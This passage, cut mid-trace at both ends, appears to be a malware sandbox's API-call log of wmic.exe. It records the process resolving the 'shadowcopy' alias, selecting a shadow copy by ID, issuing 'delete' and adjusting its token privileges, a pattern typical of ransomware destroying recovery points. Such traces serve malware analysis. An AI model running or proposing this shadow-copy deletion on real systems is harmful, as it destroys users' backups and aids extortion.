cchCount2=5) returned 3 [0089.913] lstrlenW (lpString="PATH") returned 4 [0089.913] lstrlenW (lpString="shadowcopy") returned 10 [0089.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0089.913] lstrlenW (lpString="CONTEXT") returned 7 [0089.913] lstrlenW (lpString="shadowcopy") returned 10 [0089.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0089.914] lstrlenW (lpString="shadowcopy") returned 10 [0089.914] malloc (_Size=0x16) returned 0x3bcb40 [0089.914] lstrlenW (lpString="shadowcopy") returned 10 [0089.914] GetCurrentThreadId () returned 0xac8 [0089.914] ??0CHString@@QEAA@XZ () returned 0x28f480 [0089.914] malloc (_Size=0x18) returned 0x3bcae0 [0089.914] malloc (_Size=0x18) returned 0x3bcb80 [0089.914] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e51390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff552998 | out: ppNamespace=0xff552998*=0x1e63a98) returned 0x0 [0089.937] free (_Block=0x3bcb80) [0089.937] free (_Block=0x3bcae0) [0089.937] CoSetProxyBlanket (pProxy=0x1e63a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0089.937] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.937] GetCurrentThreadId () returned 0xac8 [0089.937] ??0CHString@@QEAA@XZ () returned 0x28f318 [0089.938] malloc (_Size=0x18) returned 0x3bcae0 [0089.938] malloc (_Size=0x18) returned 0x3bcb80 [0089.938] malloc (_Size=0x18) returned 0x3bcba0 [0089.938] malloc (_Size=0x18) returned 0x3bcbc0 [0089.938] SysStringLen (param_1="root\\cli") returned 0x8 [0089.938] SysStringLen (param_1="\\") returned 0x1 [0089.938] malloc (_Size=0x18) returned 0x3bcbe0 [0089.938] SysStringLen (param_1="root\\cli\\") returned 0x9 [0089.938] SysStringLen (param_1="ms_409") returned 0x6 [0089.938] free (_Block=0x3bcbc0) [0089.938] free (_Block=0x3bcba0) [0089.938] free (_Block=0x3bcb80) [0089.938] free (_Block=0x3bcae0) [0089.938] malloc (_Size=0x18) returned 0x3bcae0 [0089.938] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e51390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff5529a0 | out: ppNamespace=0xff5529a0*=0x1e63b28) returned 0x0 [0089.944] free (_Block=0x3bcae0) [0089.944] free (_Block=0x3bcbe0) [0089.944] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.944] GetCurrentThreadId () returned 0xac8 [0089.944] ??0CHString@@QEAA@XZ () returned 0x28f490 [0089.944] malloc (_Size=0x18) returned 0x3bcbe0 [0089.944] malloc (_Size=0x18) returned 0x3bcae0 [0089.944] malloc (_Size=0x18) returned 0x3bcb80 [0089.944] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0089.944] malloc (_Size=0x3a) returned 0x3bcfa0 [0089.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff4e1980, cbMultiByte=-1, lpWideCharStr=0x3bcfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0089.944] free (_Block=0x3bcfa0) [0089.944] malloc (_Size=0x18) returned 0x3bcba0 [0089.944] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0089.944] SysStringLen (param_1="shadowcopy") returned 0xa [0089.944] malloc (_Size=0x18) returned 0x3bcbc0 [0089.944] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0089.944] SysStringLen (param_1="'") returned 0x1 [0089.945] free (_Block=0x3bcba0) [0089.945] free (_Block=0x3bcb80) [0089.945] free (_Block=0x3bcae0) [0089.945] free (_Block=0x3bcbe0) [0089.945] IWbemServices:GetObject (in: This=0x1e63a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x28f498*=0x0, ppCallResult=0x0 | out: ppObject=0x28f498*=0x1e704e0, ppCallResult=0x0) returned 0x0 [0089.953] malloc (_Size=0x18) returned 0x3bcbe0 [0089.953] IWbemClassObject:Get (in: This=0x1e704e0, wszName="Target", lFlags=0, pVal=0x28f3c0*(varType=0x0, wReserved1=0xff55, wReserved2=0x0, wReserved3=0x0, varVal1=0xff552998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f3c0*(varType=0x8, wReserved1=0xff55, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0089.953] free (_Block=0x3bcbe0) [0089.953] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0089.953] malloc (_Size=0x3e) returned 0x3bcfa0 [0089.953] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0089.953] malloc (_Size=0x18) returned 0x3bcbe0 [0089.953] IWbemClassObject:Get (in: This=0x1e704e0, wszName="PWhere", lFlags=0, pVal=0x28f3c0*(varType=0x0, wReserved1=0xff55, wReserved2=0x0, wReserved3=0x0, varVal1=0xde298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f3c0*(varType=0x8, wReserved1=0xff55, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0089.953] free (_Block=0x3bcbe0) [0089.953] lstrlenW (lpString=" Where ID = '#'") returned 15 [0089.953] malloc (_Size=0x20) returned 0x3bcff0 [0089.953] lstrlenW (lpString=" Where ID = '#'") returned 15 [0089.953] malloc (_Size=0x18) returned 0x3bcbe0 [0089.953] IWbemClassObject:Get (in: This=0x1e704e0, wszName="Connection", lFlags=0, pVal=0x28f3c0*(varType=0x0, wReserved1=0xff55, wReserved2=0x0, wReserved3=0x0, varVal1=0x12bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f3c0*(varType=0xd, wReserved1=0xff55, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e709c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0089.954] free (_Block=0x3bcbe0) [0089.954] IUnknown:QueryInterface (in: This=0x1e709c0, riid=0xff4e7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x28f3b0 | out: ppvObject=0x28f3b0*=0x1e709c0) returned 0x0 [0089.954] GetCurrentThreadId () returned 0xac8 [0089.954] ??0CHString@@QEAA@XZ () returned 0x28f2d8 [0089.954] malloc (_Size=0x18) returned 0x3bcbe0 [0089.954] IWbemClassObject:Get (in: This=0x1e709c0, wszName="Namespace", lFlags=0, pVal=0x28f300*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4f738f, varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f300*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0089.954] free (_Block=0x3bcbe0) [0089.954] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0089.954] malloc (_Size=0x16) returned 0x3bcbe0 [0089.954] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0089.954] malloc (_Size=0x18) returned 0x3bcae0 [0089.954] IWbemClassObject:Get (in: This=0x1e709c0, wszName="Locale", lFlags=0, pVal=0x28f300*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a658, varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f300*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0089.954] free (_Block=0x3bcae0) [0089.954] lstrlenW (lpString="ms_409") returned 6 [0089.954] malloc (_Size=0xe) returned 0x3bcae0 [0089.954] lstrlenW (lpString="ms_409") returned 6 [0089.954] malloc (_Size=0x18) returned 0x3bcb80 [0089.954] IWbemClassObject:Get (in: This=0x1e709c0, wszName="User", lFlags=0, pVal=0x28f300*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a658, varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f300*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a658, varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0089.955] free (_Block=0x3bcb80) [0089.955] malloc (_Size=0x18) returned 0x3bcb80 [0089.955] IWbemClassObject:Get (in: This=0x1e709c0, wszName="Password", lFlags=0, pVal=0x28f300*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a658, varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f300*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a658, varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0089.955] free (_Block=0x3bcb80) [0089.955] malloc (_Size=0x18) returned 0x3bcb80 [0089.955] IWbemClassObject:Get (in: This=0x1e709c0, wszName="Server", lFlags=0, pVal=0x28f300*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a658, varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f300*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0089.955] free (_Block=0x3bcb80) [0089.955] lstrlenW (lpString=".") returned 1 [0089.955] malloc (_Size=0x4) returned 0x3b7140 [0089.955] lstrlenW (lpString=".") returned 1 [0089.955] malloc (_Size=0x18) returned 0x3bcb80 [0089.955] IWbemClassObject:Get (in: This=0x1e709c0, wszName="Authority", lFlags=0, pVal=0x28f300*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a658, varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x28f300*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a658, varVal2=0x3bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0089.955] free (_Block=0x3bcb80) [0089.955] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.955] IUnknown:Release (This=0x1e709c0) returned 0x1 [0089.955] GetCurrentThreadId () returned 0xac8 [0089.956] ??0CHString@@QEAA@XZ () returned 0x28f2d8 [0089.956] malloc (_Size=0x18) returned 0x3bcb80 [0089.956] IWbemClassObject:Get (in: This=0x1e704e0, wszName="__RELPATH", lFlags=0, pVal=0x28f300*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15a658, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x28f300*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0089.956] free (_Block=0x3bcb80) [0089.956] malloc (_Size=0x18) returned 0x3bcb80 [0089.956] GetCurrentThreadId () returned 0xac8 [0089.956] ??0CHString@@QEAA@XZ () returned 0x28f158 [0089.956] ??0CHString@@QEAA@PEBG@Z () returned 0x28f170 [0089.956] ??0CHString@@QEAA@AEBV0@@Z () returned 0x28f100 [0089.956] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0089.956] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x3bd020 [0089.956] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0089.956] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x28f0c0 [0089.956] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x28f108 [0089.956] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f170 [0089.956] ??1CHString@@QEAA@XZ () returned 0x2afa3501 [0089.957] ??1CHString@@QEAA@XZ () returned 0x2afa3501 [0089.957] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x28f0c8 [0089.957] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f100 [0089.957] ??1CHString@@QEAA@XZ () returned 0x1 [0089.957] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x3bd090 [0089.957] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0089.957] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x28f0c0 [0089.957] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x28f108 [0089.957] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f170 [0089.957] ??1CHString@@QEAA@XZ () returned 0x2afa3501 [0089.957] ??1CHString@@QEAA@XZ () returned 0x2afa3501 [0089.957] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x28f0c8 [0089.957] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x28f100 [0089.957] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.957] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0089.957] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.957] malloc (_Size=0x18) returned 0x3bcba0 [0089.957] malloc (_Size=0x18) returned 0x3bcc00 [0089.957] malloc (_Size=0x18) returned 0x3bcc20 [0089.957] malloc (_Size=0x18) returned 0x3bcc40 [0089.957] malloc (_Size=0x18) returned 0x3bcc60 [0089.957] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0089.957] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0089.957] malloc (_Size=0x18) returned 0x3bcc80 [0089.957] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0089.958] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0089.958] malloc (_Size=0x18) returned 0x3bcca0 [0089.958] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0089.958] SysStringLen (param_1="\"") returned 0x1 [0089.958] free (_Block=0x3bcc80) [0089.958] free (_Block=0x3bcc60) [0089.958] free (_Block=0x3bcc40) [0089.958] free (_Block=0x3bcc20) [0089.958] free (_Block=0x3bcc00) [0089.958] free (_Block=0x3bcba0) [0089.958] IWbemServices:GetObject (in: This=0x1e63b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x28f148*=0x0, ppCallResult=0x0 | out: ppObject=0x28f148*=0x1e70a50, ppCallResult=0x0) returned 0x0 [0089.960] malloc (_Size=0x18) returned 0x3bcba0 [0089.960] IWbemClassObject:Get (in: This=0x1e70a50, wszName="Text", lFlags=0, pVal=0x28f180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff552ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x28f180*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x154ab0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0xde030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0089.960] free (_Block=0x3bcba0) [0089.960] SafeArrayGetLBound (in: psa=0x154ab0, nDim=0x1, plLbound=0x28f160 | out: plLbound=0x28f160) returned 0x0 [0089.960] SafeArrayGetUBound (in: psa=0x154ab0, nDim=0x1, plUbound=0x28f150 | out: plUbound=0x28f150) returned 0x0 [0089.960] SafeArrayGetElement (in: psa=0x154ab0, rgIndices=0x28f144, pv=0x28f198 | out: pv=0x28f198) returned 0x0 [0089.960] malloc (_Size=0x18) returned 0x3bcba0 [0089.960] malloc (_Size=0x18) returned 0x3bcc00 [0089.960] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0089.960] free (_Block=0x3bcba0) [0089.960] IUnknown:Release (This=0x1e70a50) returned 0x0 [0089.960] free (_Block=0x3bcca0) [0089.960] ??1CHString@@QEAA@XZ () returned 0x2afa3501 [0089.960] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.960] free (_Block=0x3bcb80) [0089.961] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.961] lstrlenW (lpString="Shadow copy management.") returned 23 [0089.961] malloc (_Size=0x30) returned 0x3b85c0 [0089.961] lstrlenW (lpString="Shadow copy management.") returned 23 [0089.961] free (_Block=0x3bcc00) [0089.961] IUnknown:Release (This=0x1e704e0) returned 0x0 [0089.961] free (_Block=0x3bcbc0) [0089.961] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.961] lstrlenW (lpString="PATH") returned 4 [0089.961] lstrlenW (lpString="where") returned 5 [0089.961] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0089.961] lstrlenW (lpString="WHERE") returned 5 [0089.961] lstrlenW (lpString="where") returned 5 [0089.961] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0089.961] lstrlenW (lpString="/") returned 1 [0089.961] lstrlenW (lpString="ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'") returned 43 [0089.961] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0089.961] lstrlenW (lpString="-") returned 1 [0089.961] lstrlenW (lpString="ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'") returned 43 [0089.961] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0089.961] lstrlenW (lpString="ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'") returned 43 [0089.961] malloc (_Size=0x58) returned 0x3bd020 [0089.961] lstrlenW (lpString="ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'") returned 43 [0089.961] lstrlenW (lpString="/") returned 1 [0089.961] lstrlenW (lpString="delete") returned 6 [0089.962] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0089.962] lstrlenW (lpString="-") returned 1 [0089.962] lstrlenW (lpString="delete") returned 6 [0089.962] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0089.962] lstrlenW (lpString="delete") returned 6 [0089.962] malloc (_Size=0xe) returned 0x3bcbc0 [0089.962] lstrlenW (lpString="delete") returned 6 [0089.962] lstrlenW (lpString="GET") returned 3 [0089.962] lstrlenW (lpString="delete") returned 6 [0089.962] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0089.962] lstrlenW (lpString="LIST") returned 4 [0089.962] lstrlenW (lpString="delete") returned 6 [0089.962] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0089.962] lstrlenW (lpString="SET") returned 3 [0089.962] lstrlenW (lpString="delete") returned 6 [0089.962] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0089.962] lstrlenW (lpString="CREATE") returned 6 [0089.962] lstrlenW (lpString="delete") returned 6 [0089.962] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0089.962] lstrlenW (lpString="CALL") returned 4 [0089.962] lstrlenW (lpString="delete") returned 6 [0089.962] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0089.962] lstrlenW (lpString="ASSOC") returned 5 [0089.962] lstrlenW (lpString="delete") returned 6 [0089.962] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0089.962] lstrlenW (lpString="DELETE") returned 6 [0089.962] lstrlenW (lpString="delete") returned 6 [0089.962] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0089.963] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0089.963] malloc (_Size=0x3e) returned 0x3bd080 [0089.963] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0089.963] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0089.963] malloc (_Size=0x18) returned 0x3bcc00 [0089.963] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0089.963] lstrlenW (lpString="FROM") returned 4 [0089.963] lstrlenW (lpString="*") returned 1 [0089.963] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0089.963] malloc (_Size=0x18) returned 0x3bcb80 [0089.963] free (_Block=0x3bcc00) [0089.963] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0089.963] lstrlenW (lpString="FROM") returned 4 [0089.963] lstrlenW (lpString="from") returned 4 [0089.963] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0089.963] malloc (_Size=0x18) returned 0x3bcc00 [0089.963] free (_Block=0x3bcb80) [0089.963] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0089.963] malloc (_Size=0x18) returned 0x3bcb80 [0089.963] free (_Block=0x3bcc00) [0089.963] free (_Block=0x3bd080) [0089.964] free (_Block=0x3bcb80) [0089.964] lstrlenW (lpString="SET") returned 3 [0089.964] lstrlenW (lpString="delete") returned 6 [0089.964] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0089.964] lstrlenW (lpString="CREATE") returned 6 [0089.964] lstrlenW (lpString="delete") returned 6 [0089.964] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0089.964] free (_Block=0x3bcef0) [0089.964] malloc (_Size=0x8) returned 0x3b6f20 [0089.964] lstrlenW (lpString="GET") returned 3 [0089.964] lstrlenW (lpString="delete") returned 6 [0089.964] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0089.964] lstrlenW (lpString="LIST") returned 4 [0089.964] lstrlenW (lpString="delete") returned 6 [0089.964] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0089.964] lstrlenW (lpString="ASSOC") returned 5 [0089.964] lstrlenW (lpString="delete") returned 6 [0089.964] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0089.964] WbemLocator:IUnknown:AddRef (This=0x1e51390) returned 0x3 [0089.964] free (_Block=0x3cdfb0) [0089.964] lstrlenW (lpString="") returned 0 [0089.964] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.964] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0089.964] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.964] malloc (_Size=0x14) returned 0x3bcb80 [0089.964] lstrlenW (lpString="XDUWTFONO") returned 9 [0089.964] GetCurrentThreadId () returned 0xac8 [0089.965] GetCurrentProcess () returned 0xffffffffffffffff [0089.965] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x28f520 | out: TokenHandle=0x28f520*=0x27c) returned 1 [0089.965] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28f518 | out: TokenInformation=0x0, ReturnLength=0x28f518) returned 0 [0089.965] malloc (_Size=0x118) returned 0x3bd080 [0089.965] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x3bd080, TokenInformationLength=0x118, ReturnLength=0x28f518 | out: TokenInformation=0x3bd080, ReturnLength=0x28f518) returned 1 [0089.965] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x3bd080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-872794153, Attributes=0x892e), (Luid.LowPart=0x0, Luid.HighPart=3919600, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0089.965] free (_Block=0x3bd080) [0089.965] CloseHandle (hObject=0x27c) returned 1 [0089.965] lstrlenW (lpString="GET") returned 3 [0089.965] lstrlenW (lpString="delete") returned 6 [0089.965] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0089.965] lstrlenW (lpString="LIST") returned 4 [0089.965] lstrlenW (lpString="delete") returned 6 [0089.965] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0089.965] lstrlenW (lpString="SET") returned 3 [0089.965] lstrlenW (lpString="delete") returned 6 [0089.965] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0089.966] lstrlenW (lpString="CALL") returned 4 [0089.966] lstrlenW (lpString="delete") returned 6 [0089.966] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0089.966] lstrlenW (lpString="ASSOC") returned 5 [0089.966] lstrlenW (lpString="delete") returned 6 [0089.966] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0089.966] lstrlenW (lpString="CREATE") returned 6 [0089.966] lstrlenW (lpString="delete") returned 6 [0089.966] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0089.966] lstrlenW (lpString="DELETE") returned 6 [0089.966] lstrlenW (lpString="delete") returned 6 [0089.966] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, 